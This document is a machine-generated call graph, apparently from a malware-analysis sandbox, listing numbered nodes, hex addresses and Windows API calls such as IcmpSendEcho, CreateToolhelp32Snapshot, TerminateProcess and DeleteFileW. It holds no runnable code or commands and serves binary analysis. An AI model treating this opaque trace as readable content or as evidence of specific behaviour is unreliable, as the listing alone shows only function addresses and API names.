97495->97493 97495->97494 97496 786115 97495->97496 97497 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97495->97497 97499 740aae messages 97495->97499 97658 741990 280 API calls 2 library calls 97495->97658 97659 741e50 40 API calls messages 97495->97659 97660 7a3fe1 81 API calls __wsopen_s 97496->97660 97497->97495 97661 7a3fe1 81 API calls __wsopen_s 97499->97661 97501 7b0fe1 97500->97501 97502 7b100f WSAStartup 97501->97502 97700 73c98d 39 API calls 97501->97700 97503 7b1054 97502->97503 97524 7b1023 messages 97502->97524 97664 74c1f6 97503->97664 97506 7b0ffc 97506->97502 97701 73c98d 39 API calls 97506->97701 97511 7b100b 97511->97502 97513 7b1075 inet_addr gethostbyname 97514 7b1093 IcmpCreateFile 97513->97514 97513->97524 97515 7b10d3 97514->97515 97514->97524 97516 75017b 8 API calls 97515->97516 97517 7b10ec 97516->97517 97518 73423c 8 API calls 97517->97518 97519 7b10f7 97518->97519 97520 7b112b IcmpSendEcho 97519->97520 97521 7b1102 IcmpSendEcho 97519->97521 97523 7b114c 97520->97523 97521->97523 97522 7b1212 IcmpCloseHandle WSACleanup 97522->97524 97523->97522 97524->97443 97526 738ec0 52 API calls 97525->97526 97527 74ac68 97526->97527 97708 74bc58 97527->97708 97529 74ac7f 97540 74b09b _wcslen 97529->97540 97713 73c98d 39 API calls 97529->97713 97531 74bbbe 43 API calls 97531->97540 97533 737ad5 8 API calls 97533->97540 97535 736c03 8 API calls 97535->97540 97537 73c98d 39 API calls 97537->97540 97538 74b1fb 97538->97443 97539 738ec0 52 API calls 97539->97540 97540->97531 97540->97533 97540->97535 97540->97537 97540->97538 97540->97539 97541 738577 8 API calls 97540->97541 97542 73396b 60 API calls 97540->97542 97543 733907 Shell_NotifyIconW 97540->97543 97714 754d98 97540->97714 97724 73ad40 8 API calls __fread_nolock 97540->97724 97725 737b1a 8 API calls 97540->97725 97541->97540 97542->97540 97543->97540 97545 75017b 8 API calls 97544->97545 97546 7af95b 97545->97546 97547 73423c 8 API calls 97546->97547 97548 7af965 97547->97548 97549 738ec0 52 API calls 97548->97549 97550 7af97c GetEnvironmentVariableW 97549->97550 97729 7a160f 8 API calls 97550->97729 97552 7af999 messages 97552->97443 97554 738ec0 52 API calls 97553->97554 97555 7a66b2 97554->97555 97730 79e472 lstrlenW 97555->97730 97557 7a66bc 97557->97443 97735 7b89b6 97558->97735 97560 7b9ff8 97560->97443 97562 7ad678 97561->97562 97563 7ad66d 97561->97563 97565 738ec0 52 API calls 97562->97565 97865 73c98d 39 API calls 97563->97865 97566 7ad68a 97565->97566 97860 7ac783 97566->97860 97582 738ec0 52 API calls 97581->97582 97583 7a6662 97582->97583 97866 79dc54 97583->97866 97585 7a666a 97586 7a666e GetLastError 97585->97586 97587 7a6683 97585->97587 97586->97587 97587->97443 97590 7ba5c5 97588->97590 97589 738ec0 52 API calls 97591 7ba632 97589->97591 97590->97589 97593 7ba5d4 97590->97593 97940 7a18a9 97591->97940 97593->97443 97981 7c35cc 97594->97981 97596 7c33b1 97597 73b4c8 8 API calls 97596->97597 97598 7c33f9 97597->97598 97598->97443 97600 738ec0 52 API calls 97599->97600 97601 7bad63 97600->97601 97998 79dd87 CreateToolhelp32Snapshot Process32FirstW 97601->97998 97603 7bad72 97603->97443 97605 74e32a 97604->97605 97606 74e34e 97605->97606 97607 73c760 8 API calls 97605->97607 97606->97448 97608 74e335 messages 97607->97608 97608->97448 97610 7b7b38 97609->97610 97611 7b7b52 97609->97611 98066 7a3fe1 81 API calls __wsopen_s 97610->98066 98055 7b60e6 97611->98055 97615 740340 279 API calls 97616 7b7bc1 97615->97616 97617 7b7c5c 97616->97617 97620 7b7c03 97616->97620 97640 7b7b4a 97616->97640 97618 7b7c62 97617->97618 97619 7b7cb0 97617->97619 98067 7a1ad8 8 API calls 97618->98067 97621 738ec0 52 API calls 97619->97621 97619->97640 97624 7a148b 8 API calls 97620->97624 97622 7b7cc2 97621->97622 97625 73c2c9 8 API calls 97622->97625 97627 7b7c3b 97624->97627 97628 7b7ce6 CharUpperBuffW 97625->97628 97626 7b7c85 98068 73bd07 8 API calls 97626->98068 97630 742b20 279 API calls 97627->97630 97631 7b7d00 97628->97631 97630->97640 97632 7b7d53 97631->97632 97633 7b7d07 97631->97633 97634 738ec0 52 API calls 97632->97634 98062 7a148b 97633->98062 97635 7b7d5b 97634->97635 98069 74aa65 9 API calls 97635->98069 97639 742b20 279 API calls 97639->97640 97640->97410 97641 7b7d65 97641->97640 97642 738ec0 52 API calls 97641->97642 97643 7b7d80 97642->97643 98070 73bd07 8 API calls 97643->98070 97645->97408 97646->97417 97647->97435 97648->97435 97649->97443 97650->97443 97651->97443 97652->97441 97653->97443 97654->97472 97655->97469 97656->97473 97657->97476 97658->97495 97659->97495 97660->97499 97661->97494 97662->97494 97663->97494 97665 75017b 8 API calls 97664->97665 97666 74c209 97665->97666 97667 75014b 8 API calls 97666->97667 97668 74c215 97667->97668 97669 738ec0 97668->97669 97670 738ed2 97669->97670 97671 738ed5 97669->97671 97692 74f9d4 WideCharToMultiByte 97670->97692 97672 738f0b 97671->97672 97673 738edd 97671->97673 97674 776b1f 97672->97674 97677 738f1d 97672->97677 97684 776a38 97672->97684 97702 755536 26 API calls 97673->97702 97705 7554f3 26 API calls 97674->97705 97703 74fe6f 51 API calls 97677->97703 97678 738eed 97681 75014b 8 API calls 97678->97681 97679 776b37 97679->97679 97683 738ef7 97681->97683 97685 73b329 8 API calls 97683->97685 97686 75017b 8 API calls 97684->97686 97691 776ab1 97684->97691 97685->97670 97687 776a81 97686->97687 97688 75014b 8 API calls 97687->97688 97689 776aa8 97688->97689 97690 73b329 8 API calls 97689->97690 97690->97691 97704 74fe6f 51 API calls 97691->97704 97693 74fa35 97692->97693 97694 74f9fe 97692->97694 97707 74fe8a 8 API calls 97693->97707 97695 75017b 8 API calls 97694->97695 97697 74fa05 WideCharToMultiByte 97695->97697 97706 74fa3e 8 API calls __fread_nolock 97697->97706 97699 74fa29 97699->97513 97700->97506 97701->97511 97702->97678 97703->97678 97704->97674 97705->97679 97706->97699 97707->97699 97709 75014b 8 API calls 97708->97709 97710 74bc65 97709->97710 97711 73b329 8 API calls 97710->97711 97712 74bc70 97711->97712 97712->97529 97713->97540 97715 754da6 97714->97715 97716 754e1b 97714->97716 97723 754dcb 97715->97723 97726 75f649 20 API calls _free 97715->97726 97728 754e2d 40 API calls 2 library calls 97716->97728 97719 754e28 97719->97540 97720 754db2 97727 762b5c 26 API calls _strftime 97720->97727 97722 754dbd 97722->97540 97723->97540 97724->97540 97725->97540 97726->97720 97727->97722 97728->97719 97729->97552 97731 79e4ba 97730->97731 97732 79e490 GetFileAttributesW 97730->97732 97731->97557 97732->97731 97733 79e49c FindFirstFileW 97732->97733 97733->97731 97734 79e4ad FindClose 97733->97734 97734->97731 97736 738ec0 52 API calls 97735->97736 97737 7b89ed 97736->97737 97759 7b8a32 messages 97737->97759 97773 7b9730 97737->97773 97739 7b8cde 97740 7b8eac 97739->97740 97744 7b8cec 97739->97744 97822 7b9941 59 API calls 97740->97822 97743 7b8ebb 97743->97744 97745 7b8ec7 97743->97745 97786 7b88e3 97744->97786 97745->97759 97746 738ec0 52 API calls 97764 7b8aa6 97746->97764 97751 7b8d25 97800 74ffe0 97751->97800 97754 7b8d5f 97808 737e12 97754->97808 97755 7b8d45 97807 7a3fe1 81 API calls __wsopen_s 97755->97807 97758 7b8d50 GetCurrentProcess TerminateProcess 97758->97754 97759->97560 97762 7b8d87 97771 7b8daf 97762->97771 97819 741ca0 8 API calls 97762->97819 97764->97739 97764->97746 97764->97759 97805 794ad3 8 API calls __fread_nolock 97764->97805 97806 7b8f7a 41 API calls _strftime 97764->97806 97765 7b8f22 97765->97759 97767 7b8f36 FreeLibrary 97765->97767 97766 7b8d9e 97820 7b95d8 74 API calls 97766->97820 97767->97759 97771->97765 97772 73b4c8 8 API calls 97771->97772 97821 741ca0 8 API calls 97771->97821 97823 7b95d8 74 API calls 97771->97823 97772->97771 97774 73c2c9 8 API calls 97773->97774 97775 7b974b CharLowerBuffW 97774->97775 97824 799805 97775->97824 97779 73bf73 8 API calls 97780 7b9787 97779->97780 97831 73acc0 97780->97831 97782 7b979b 97783 73adf4 8 API calls 97782->97783 97785 7b97a5 _wcslen 97783->97785 97784 7b98bb _wcslen 97784->97764 97785->97784 97843 7b8f7a 41 API calls _strftime 97785->97843 97787 7b88fe 97786->97787 97791 7b8949 97786->97791 97788 75017b 8 API calls 97787->97788 97789 7b8920 97788->97789 97790 75014b 8 API calls 97789->97790 97789->97791 97790->97789 97792 7b9af3 97791->97792 97793 7b9d08 messages 97792->97793 97798 7b9b17 _strcat _wcslen ___std_exception_copy 97792->97798 97793->97751 97794 73c98d 39 API calls 97794->97798 97795 73c63f 39 API calls 97795->97798 97796 73ca5b 39 API calls 97796->97798 97797 738ec0 52 API calls 97797->97798 97798->97793 97798->97794 97798->97795 97798->97796 97798->97797 97847 79f8c5 10 API calls _wcslen 97798->97847 97801 74fff5 97800->97801 97802 75008d CreateToolhelp32Snapshot 97801->97802 97803 75007b FindCloseChangeNotification 97801->97803 97804 75005b 97801->97804 97802->97804 97803->97804 97804->97754 97804->97755 97805->97764 97806->97764 97807->97758 97809 737e1a 97808->97809 97810 75014b 8 API calls 97809->97810 97811 737e28 97810->97811 97848 738445 97811->97848 97814 738470 97851 73c760 97814->97851 97816 738480 97817 75017b 8 API calls 97816->97817 97818 73851c 97816->97818 97817->97818 97818->97762 97819->97766 97820->97771 97821->97771 97822->97743 97823->97771 97825 799825 _wcslen 97824->97825 97827 799919 97825->97827 97829 79985a 97825->97829 97830 799914 97825->97830 97827->97830 97845 74e36b 41 API calls 97827->97845 97829->97830 97844 74e36b 41 API calls 97829->97844 97830->97779 97830->97785 97832 73accf 97831->97832 97834 73ace1 97831->97834 97833 73c2c9 8 API calls 97832->97833 97841 73acda __fread_nolock 97832->97841 97835 7805a3 __fread_nolock 97833->97835 97834->97832 97836 73ad07 97834->97836 97837 780557 97834->97837 97846 7388e8 8 API calls 97836->97846 97838 75014b 8 API calls 97837->97838 97840 780561 97838->97840 97842 75017b 8 API calls 97840->97842 97841->97782 97842->97832 97843->97784 97844->97829 97845->97827 97846->97841 97847->97798 97849 75014b 8 API calls 97848->97849 97850 737e30 97849->97850 97850->97814 97852 73c76b 97851->97852 97853 781285 97852->97853 97858 73c773 messages 97852->97858 97855 75014b 8 API calls 97853->97855 97854 73c77a 97854->97816 97856 781291 97855->97856 97858->97854 97859 73c7e0 8 API calls messages 97858->97859 97859->97858 97861 73b329 8 API calls 97860->97861 97862 7ac7ae 97861->97862 97863 73b329 8 API calls 97862->97863 97864 7ac7b9 97863->97864 97865->97562 97867 73bf73 8 API calls 97866->97867 97868 79dc73 97867->97868 97869 73bf73 8 API calls 97868->97869 97870 79dc7c 97869->97870 97871 73bf73 8 API calls 97870->97871 97872 79dc85 97871->97872 97873 735851 9 API calls 97872->97873 97874 79dc90 97873->97874 97891 79eab0 GetFileAttributesW 97874->97891 97877 79dcab 97893 73568e 97877->97893 97878 736b7c 8 API calls 97878->97877 97880 79dcbf FindFirstFileW 97881 79dd4b FindClose 97880->97881 97882 79dcde 97880->97882 97888 79dd56 97881->97888 97882->97881 97885 79dce2 97882->97885 97883 79dd26 FindNextFileW 97883->97882 97883->97885 97884 73bed9 8 API calls 97884->97885 97885->97882 97885->97883 97885->97884 97887 736b7c 8 API calls 97885->97887 97935 737bb5 8 API calls 97885->97935 97889 79dd17 DeleteFileW 97887->97889 97888->97585 97889->97883 97890 79dd42 FindClose 97889->97890 97890->97888 97892 79dc99 97891->97892 97892->97877 97892->97878 97894 73bf73 8 API calls 97893->97894 97895 7356a4 97894->97895 97896 73bf73 8 API calls 97895->97896 97897 7356ac 97896->97897 97898 73bf73 8 API calls 97897->97898 97899 7356b4 97898->97899 97900 73bf73 8 API calls 97899->97900 97901 7356bc 97900->97901 97902 7356f0 97901->97902 97903 774da1 97901->97903 97905 73acc0 8 API calls 97902->97905 97904 73bed9 8 API calls 97903->97904 97906 774daa 97904->97906 97907 7356fe 97905->97907 97908 73bd57 8 API calls 97906->97908 97909 73adf4 8 API calls 97907->97909 97910 735733 97908->97910 97911 735708 97909->97911 97916 735754 97910->97916 97925 774dcc 97910->97925 97928 735778 97910->97928 97911->97910 97912 73acc0 8 API calls 97911->97912 97914 735729 97912->97914 97913 73acc0 8 API calls 97917 735789 97913->97917 97915 73adf4 8 API calls 97914->97915 97915->97910 97916->97928 97936 73655e 97916->97936 97919 73579f 97917->97919 97923 73bed9 8 API calls 97917->97923 97920 7357b3 97919->97920 97926 73bed9 8 API calls 97919->97926 97924 7357be 97920->97924 97929 73bed9 8 API calls 97920->97929 97921 735761 97927 73acc0 8 API calls 97921->97927 97921->97928 97922 738577 8 API calls 97932 774e8c 97922->97932 97923->97919 97930 73bed9 8 API calls 97924->97930 97933 7357c9 97924->97933 97925->97922 97926->97920 97927->97928 97928->97913 97929->97924 97930->97933 97931 73655e 8 API calls 97931->97932 97932->97928 97932->97931 97939 73ad40 8 API calls __fread_nolock 97932->97939 97933->97880 97935->97885 97937 73c2c9 8 API calls 97936->97937 97938 736569 97937->97938 97938->97921 97939->97932 97941 7a18b6 97940->97941 97942 75014b 8 API calls 97941->97942 97943 7a18bd 97942->97943 97946 79fcb5 97943->97946 97945 7a18f7 97945->97593 97947 73c2c9 8 API calls 97946->97947 97948 79fcc8 CharLowerBuffW 97947->97948 97951 79fcdb 97948->97951 97949 73655e 8 API calls 97949->97951 97950 79fd19 97952 79fd2b 97950->97952 97953 73655e 8 API calls 97950->97953 97951->97949 97951->97950 97963 79fce5 ___scrt_fastfail 97951->97963 97954 75017b 8 API calls 97952->97954 97953->97952 97958 79fd59 97954->97958 97955 79fd7b 97964 79fe0c 97955->97964 97958->97955 97979 79fbed 8 API calls 97958->97979 97959 79fdb8 97960 75014b 8 API calls 97959->97960 97959->97963 97961 79fdd2 97960->97961 97962 75017b 8 API calls 97961->97962 97962->97963 97963->97945 97965 73bf73 8 API calls 97964->97965 97966 79fe3e 97965->97966 97967 73bf73 8 API calls 97966->97967 97968 79fe47 97967->97968 97969 73bf73 8 API calls 97968->97969 97973 79fe50 97969->97973 97970 738577 8 API calls 97970->97973 97971 7a0114 97971->97959 97972 7566f8 GetStringTypeW 97972->97973 97973->97970 97973->97971 97973->97972 97975 756641 39 API calls 97973->97975 97976 79fe0c 40 API calls 97973->97976 97977 73ad40 8 API calls 97973->97977 97978 73bed9 8 API calls 97973->97978 97980 756722 GetStringTypeW _strftime 97973->97980 97975->97973 97976->97973 97977->97973 97978->97973 97979->97958 97980->97973 97987 7c3574 97981->97987 97984 7c35ed timeGetTime 97984->97596 97988 73b4c8 8 API calls 97987->97988 97989 7c358f 97988->97989 97990 7c35b9 97989->97990 97991 7c359b 97989->97991 97992 738577 8 API calls 97990->97992 97993 738ec0 52 API calls 97991->97993 97995 7c35b7 97992->97995 97994 7c35a8 97993->97994 97994->97995 97996 73bed9 8 API calls 97994->97996 97995->97984 97997 73c98d 39 API calls 97995->97997 97996->97995 97997->97984 98008 79e80e 97998->98008 98000 79ddd4 Process32NextW 98001 79de86 FindCloseChangeNotification 98000->98001 98006 79ddcd 98000->98006 98001->97603 98002 73bf73 8 API calls 98002->98006 98003 73b329 8 API calls 98003->98006 98004 73568e 8 API calls 98004->98006 98006->98000 98006->98001 98006->98002 98006->98003 98006->98004 98014 737bb5 8 API calls 98006->98014 98015 74e36b 41 API calls 98006->98015 98009 79e819 98008->98009 98010 79e830 98009->98010 98013 79e836 98009->98013 98016 756722 GetStringTypeW _strftime 98009->98016 98017 75666b 98010->98017 98013->98006 98014->98006 98015->98006 98016->98009 98018 756684 _strftime 98017->98018 98021 755f80 98018->98021 98039 7565c9 98021->98039 98023 755fd7 98048 754d15 38 API calls 2 library calls 98023->98048 98024 755f93 98024->98023 98025 755faa 98024->98025 98038 755fba 98024->98038 98046 75f649 20 API calls _free 98025->98046 98028 755faf 98047 762b5c 26 API calls _strftime 98028->98047 98031 755fe2 98032 75600b 98031->98032 98049 763a62 GetStringTypeW 98031->98049 98033 756215 __aulldvrm 98032->98033 98050 75659d 26 API calls 2 library calls 98032->98050 98051 75659d 26 API calls 2 library calls 98033->98051 98036 7564f6 98036->98038 98052 75f649 20 API calls _free 98036->98052 98038->98013 98040 7565e1 98039->98040 98041 7565ce 98039->98041 98040->98024 98053 75f649 20 API calls _free 98041->98053 98043 7565d3 98054 762b5c 26 API calls _strftime 98043->98054 98045 7565de 98045->98024 98046->98028 98047->98038 98048->98031 98049->98031 98050->98033 98051->98036 98052->98038 98053->98043 98054->98045 98056 7b6101 98055->98056 98057 7b614f 98055->98057 98058 75017b 8 API calls 98056->98058 98057->97615 98060 7b6123 98058->98060 98059 75014b 8 API calls 98059->98060 98060->98057 98060->98059 98071 7a1400 8 API calls 98060->98071 98063 7a1499 98062->98063 98065 7a14d2 98062->98065 98064 75014b 8 API calls 98063->98064 98063->98065 98064->98065 98065->97639 98066->97640 98067->97626 98068->97640 98069->97641 98070->97640 98071->98060 98072 731098 98077 735fc8 98072->98077 98076 7310a7 98078 73bf73 8 API calls 98077->98078 98079 735fdf GetVersionExW 98078->98079 98080 738577 8 API calls 98079->98080 98081 73602c 98080->98081 98082 73adf4 8 API calls 98081->98082 98086 736062 98081->98086 98083 736056 98082->98083 98085 7355dc 8 API calls 98083->98085 98084 73611c GetCurrentProcess IsWow64Process 98087 736138 98084->98087 98085->98086 98086->98084 98092 775224 98086->98092 98088 736150 LoadLibraryA 98087->98088 98089 775269 GetSystemInfo 98087->98089 98090 736161 GetProcAddress 98088->98090 98091 73619d GetSystemInfo 98088->98091 98090->98091 98093 736171 GetNativeSystemInfo 98090->98093 98094 736177 98091->98094 98093->98094 98095 73109d 98094->98095 98096 73617b FreeLibrary 98094->98096 98097 750413 29 API calls __onexit 98095->98097 98096->98095 98097->98076 98098 79f292 98099 79f29f 98098->98099 98100 79f310 98098->98100 98101 79f2a1 Sleep 98099->98101 98103 79f2aa QueryPerformanceCounter 98099->98103 98101->98100 98103->98101 98104 79f2b8 QueryPerformanceFrequency 98103->98104 98105 79f2c2 Sleep QueryPerformanceCounter 98104->98105 98106 79f303 98105->98106 98106->98105 98107 79f307 98106->98107 98107->98100 98108 76947a 98109 769487 98108->98109 98113 76949f 98108->98113 98165 75f649 20 API calls _free 98109->98165 98111 76948c 98166 762b5c 26 API calls _strftime 98111->98166 98112 769497 98113->98112 98115 7694fa 98113->98115 98167 770144 21 API calls 2 library calls 98113->98167 98128 75dcc5 98115->98128 98118 769512 98135 768fb2 98118->98135 98120 769519 98120->98112 98121 75dcc5 __fread_nolock 26 API calls 98120->98121 98122 769545 98121->98122 98122->98112 98123 75dcc5 __fread_nolock 26 API calls 98122->98123 98124 769553 98123->98124 98124->98112 98125 75dcc5 __fread_nolock 26 API calls 98124->98125 98126 769563 98125->98126 98127 75dcc5 __fread_nolock 26 API calls 98126->98127 98127->98112 98129 75dce6 98128->98129 98130 75dcd1 98128->98130 98129->98118 98168 75f649 20 API calls _free 98130->98168 98132 75dcd6 98169 762b5c 26 API calls _strftime 98132->98169 98134 75dce1 98134->98118 98136 768fbe ___BuildCatchObject 98135->98136 98137 768fc6 98136->98137 98138 768fde 98136->98138 98236 75f636 20 API calls _free 98137->98236 98139 7690a4 98138->98139 98144 769017 98138->98144 98243 75f636 20 API calls _free 98139->98243 98141 768fcb 98237 75f649 20 API calls _free 98141->98237 98147 769026 98144->98147 98148 76903b 98144->98148 98145 7690a9 98244 75f649 20 API calls _free 98145->98244 98146 768fd3 __fread_nolock 98146->98120 98238 75f636 20 API calls _free 98147->98238 98170 7654ba EnterCriticalSection 98148->98170 98152 76902b 98239 75f649 20 API calls _free 98152->98239 98153 769041 98156 769072 98153->98156 98157 76905d 98153->98157 98171 7690c5 98156->98171 98240 75f649 20 API calls _free 98157->98240 98160 769033 98245 762b5c 26 API calls _strftime 98160->98245 98161 769062 98241 75f636 20 API calls _free 98161->98241 98162 76906d 98242 76909c LeaveCriticalSection __wsopen_s 98162->98242 98165->98111 98166->98112 98167->98115 98168->98132 98169->98134 98170->98153 98172 7690d7 98171->98172 98173 7690ef 98171->98173 98262 75f636 20 API calls _free 98172->98262 98175 769459 98173->98175 98180 769134 98173->98180 98285 75f636 20 API calls _free 98175->98285 98176 7690dc 98263 75f649 20 API calls _free 98176->98263 98179 76945e 98286 75f649 20 API calls _free 98179->98286 98181 7690e4 98180->98181 98183 76913f 98180->98183 98188 76916f 98180->98188 98181->98162 98264 75f636 20 API calls _free 98183->98264 98184 76914c 98287 762b5c 26 API calls _strftime 98184->98287 98186 769144 98265 75f649 20 API calls _free 98186->98265 98190 769188 98188->98190 98191 7691ae 98188->98191 98192 7691ca 98188->98192 98190->98191 98224 769195 98190->98224 98266 75f636 20 API calls _free 98191->98266 98246 763b93 98192->98246 98195 7691b3 98267 75f649 20 API calls _free 98195->98267 98200 769333 98203 7693a9 98200->98203 98205 76934c GetConsoleMode 98200->98205 98201 7691ba 98268 762b5c 26 API calls _strftime 98201->98268 98202 7691ea 98206 762d38 _free 20 API calls 98202->98206 98207 7693ad ReadFile 98203->98207 98205->98203 98208 76935d 98205->98208 98209 7691f1 98206->98209 98210 7693c7 98207->98210 98211 769421 GetLastError 98207->98211 98208->98207 98212 769363 ReadConsoleW 98208->98212 98213 769216 98209->98213 98214 7691fb 98209->98214 98210->98211 98217 76939e 98210->98217 98215 769385 98211->98215 98216 76942e 98211->98216 98212->98217 98219 76937f GetLastError 98212->98219 98277 7697a4 98213->98277 98275 75f649 20 API calls _free 98214->98275 98233 7691c5 __fread_nolock 98215->98233 98280 75f613 20 API calls 2 library calls 98215->98280 98283 75f649 20 API calls _free 98216->98283 98228 769403 98217->98228 98229 7693ec 98217->98229 98217->98233 98219->98215 98220 762d38 _free 20 API calls 98220->98181 98223 769433 98284 75f636 20 API calls _free 98223->98284 98253 76fc1b 98224->98253 98226 769200 98276 75f636 20 API calls _free 98226->98276 98232 76941a 98228->98232 98228->98233 98281 768de1 31 API calls 3 library calls 98229->98281 98282 768c21 29 API calls __fread_nolock 98232->98282 98233->98220 98235 76941f 98235->98233 98236->98141 98237->98146 98238->98152 98239->98160 98240->98161 98241->98162 98242->98146 98243->98145 98244->98160 98245->98146 98247 763bd1 98246->98247 98251 763ba1 CallUnexpected 98246->98251 98289 75f649 20 API calls _free 98247->98289 98248 763bbc RtlAllocateHeap 98250 763bcf 98248->98250 98248->98251 98269 762d38 98250->98269 98251->98247 98251->98248 98288 75521d 7 API calls 2 library calls 98251->98288 98254 76fc35 98253->98254 98255 76fc28 98253->98255 98258 76fc41 98254->98258 98291 75f649 20 API calls _free 98254->98291 98290 75f649 20 API calls _free 98255->98290 98258->98200 98259 76fc62 98292 762b5c 26 API calls _strftime 98259->98292 98260 76fc2d 98260->98200 98262->98176 98263->98181 98264->98186 98265->98184 98266->98195 98267->98201 98268->98233 98270 762d43 RtlFreeHeap 98269->98270 98271 762d6c _free 98269->98271 98270->98271 98272 762d58 98270->98272 98271->98202 98293 75f649 20 API calls _free 98272->98293 98274 762d5e GetLastError 98274->98271 98275->98226 98276->98233 98294 76970b 98277->98294 98280->98233 98281->98233 98282->98235 98283->98223 98284->98233 98285->98179 98286->98184 98287->98181 98288->98251 98289->98250 98290->98260 98291->98259 98292->98260 98293->98274 98303 765737 98294->98303 98296 76971d 98297 769736 SetFilePointerEx 98296->98297 98298 769725 98296->98298 98300 76974e GetLastError 98297->98300 98302 76972a 98297->98302 98316 75f649 20 API calls _free 98298->98316 98317 75f613 20 API calls 2 library calls 98300->98317 98302->98224 98304 765744 98303->98304 98306 765759 98303->98306 98318 75f636 20 API calls _free 98304->98318 98311 76577e 98306->98311 98320 75f636 20 API calls _free 98306->98320 98307 765749 98319 75f649 20 API calls _free 98307->98319 98309 765789 98321 75f649 20 API calls _free 98309->98321 98311->98296 98313 765751 98313->98296 98314 765791 98322 762b5c 26 API calls _strftime 98314->98322 98316->98302 98317->98302 98318->98307 98319->98313 98320->98309 98321->98314 98322->98313 98323 73dd3d 98324 73dd63 98323->98324 98325 7819c2 98323->98325 98326 73dead 98324->98326 98327 75014b 8 API calls 98324->98327 98329 781a82 98325->98329 98330 781a26 98325->98330 98337 781a46 98325->98337 98331 75017b 8 API calls 98326->98331 98334 73dd8d 98327->98334 98383 7a3fe1 81 API calls __wsopen_s 98329->98383 98381 74e6e8 280 API calls 98330->98381 98342 73dee4 __fread_nolock 98331->98342 98332 781a7d 98336 75014b 8 API calls 98334->98336 98334->98342 98338 73dddb 98336->98338 98337->98332 98382 7a3fe1 81 API calls __wsopen_s 98337->98382 98338->98330 98340 73de16 98338->98340 98339 75017b 8 API calls 98339->98342 98341 740340 280 API calls 98340->98341 98343 73de29 98341->98343 98342->98337 98342->98339 98343->98332 98343->98342 98344 781aa5 98343->98344 98345 73de77 98343->98345 98347 73d526 98343->98347 98384 7a3fe1 81 API calls __wsopen_s 98344->98384 98345->98326 98345->98347 98348 75014b 8 API calls 98347->98348 98349 73d589 98348->98349 98365 73c32d 98349->98365 98352 75014b 8 API calls 98357 73d66e messages 98352->98357 98354 73b4c8 8 API calls 98354->98357 98356 781f79 98385 7956ae 8 API calls messages 98356->98385 98357->98354 98357->98356 98358 781f94 98357->98358 98360 73bed9 8 API calls 98357->98360 98361 73c3ab 8 API calls 98357->98361 98362 73d911 messages 98357->98362 98360->98357 98361->98357 98363 73d9ac messages 98362->98363 98372 73c3ab 98362->98372 98364 73d9c3 98363->98364 98380 74e30a 8 API calls messages 98363->98380 98371 73c33d 98365->98371 98366 73c345 98366->98352 98367 75014b 8 API calls 98367->98371 98368 73bf73 8 API calls 98368->98371 98369 73bed9 8 API calls 98369->98371 98370 73c32d 8 API calls 98370->98371 98371->98366 98371->98367 98371->98368 98371->98369 98371->98370 98373 73c3b9 98372->98373 98379 73c3e1 messages 98372->98379 98374 73c3c7 98373->98374 98375 73c3ab 8 API calls 98373->98375 98376 73c3cd 98374->98376 98377 73c3ab 8 API calls 98374->98377 98375->98374 98376->98379 98386 73c7e0 8 API calls messages 98376->98386 98377->98376 98379->98363 98380->98363 98381->98337 98382->98332 98383->98332 98384->98332 98385->98358 98386->98379 98387 73f4dc 98390 73cab0 98387->98390 98391 73cacb 98390->98391 98392 78150c 98391->98392 98393 7814be 98391->98393 98411 73caf0 98391->98411 98434 7b62ff 280 API calls 2 library calls 98392->98434 98396 7814c8 98393->98396 98399 7814d5 98393->98399 98393->98411 98432 7b6790 280 API calls 98396->98432 98398 74bc58 8 API calls 98398->98411 98413 73cdc0 98399->98413 98433 7b6c2d 280 API calls 2 library calls 98399->98433 98402 74e807 39 API calls 98402->98411 98403 78179f 98403->98403 98407 73cdee 98408 7816e8 98436 7b6669 81 API calls 98408->98436 98411->98398 98411->98402 98411->98407 98411->98408 98411->98413 98414 73b4c8 8 API calls 98411->98414 98417 73cf80 39 API calls 98411->98417 98418 740340 280 API calls 98411->98418 98419 73bed9 8 API calls 98411->98419 98421 73be2d 98411->98421 98425 74e7c1 39 API calls 98411->98425 98426 74aa99 280 API calls 98411->98426 98427 7505b2 5 API calls __Init_thread_wait 98411->98427 98428 750413 29 API calls __onexit 98411->98428 98429 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98411->98429 98430 74f4df 81 API calls 98411->98430 98431 74f346 280 API calls 98411->98431 98435 78ffaf 8 API calls 98411->98435 98413->98407 98437 7a3fe1 81 API calls __wsopen_s 98413->98437 98414->98411 98417->98411 98418->98411 98419->98411 98422 73be38 98421->98422 98423 73be67 98422->98423 98438 73bfa5 39 API calls 98422->98438 98423->98411 98425->98411 98426->98411 98427->98411 98428->98411 98429->98411 98430->98411 98431->98411 98432->98399 98433->98413 98434->98411 98435->98411 98436->98413 98437->98403 98438->98423 98439 783c0a 98460 79c819 98439->98460 98442 783c14 98443 783c3f 98442->98443 98444 79c819 Sleep 98442->98444 98449 73efdb 98442->98449 98466 74aa65 9 API calls 98442->98466 98445 73b329 8 API calls 98443->98445 98444->98442 98446 783c6f 98445->98446 98467 73bfa5 39 API calls 98446->98467 98448 783c8b 98468 7a446f 8 API calls 98448->98468 98453 73f450 98449->98453 98452 73f097 98454 73f46f 98453->98454 98455 73f483 98453->98455 98469 73e960 280 API calls 2 library calls 98454->98469 98470 7a3fe1 81 API calls __wsopen_s 98455->98470 98458 73f47a 98458->98452 98459 784584 98459->98459 98461 79c824 98460->98461 98463 79c83f 98460->98463 98461->98442 98462 79c86d 98462->98442 98463->98462 98464 79c85b Sleep 98463->98464 98464->98462 98466->98442 98467->98448 98468->98452 98469->98458 98470->98459 98471 7850ca 98483 73f800 messages 98471->98483 98473 740340 280 API calls 98473->98483 98474 741ca0 8 API calls 98474->98483 98475 73be2d 39 API calls 98475->98483 98476 73bf73 8 API calls 98476->98483 98477 73fae1 98479 73bed9 8 API calls 98479->98483 98480 7a3fe1 81 API calls 98480->98483 98483->98473 98483->98474 98483->98475 98483->98476 98483->98477 98483->98479 98483->98480 98486 74b35c 280 API calls 98483->98486 98487 7505b2 5 API calls __Init_thread_wait 98483->98487 98488 750413 29 API calls __onexit 98483->98488 98489 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98483->98489 98490 7b5231 101 API calls 98483->98490 98491 7b731e 280 API calls 98483->98491 98486->98483 98487->98483 98488->98483 98489->98483 98490->98483 98491->98483 98492 73f4c0 98495 74a025 98492->98495 98494 73f4cc 98496 74a046 98495->98496 98501 74a0a3 98495->98501 98497 740340 280 API calls 98496->98497 98496->98501 98502 74a077 98497->98502 98499 78806b 98499->98499 98500 74a0e7 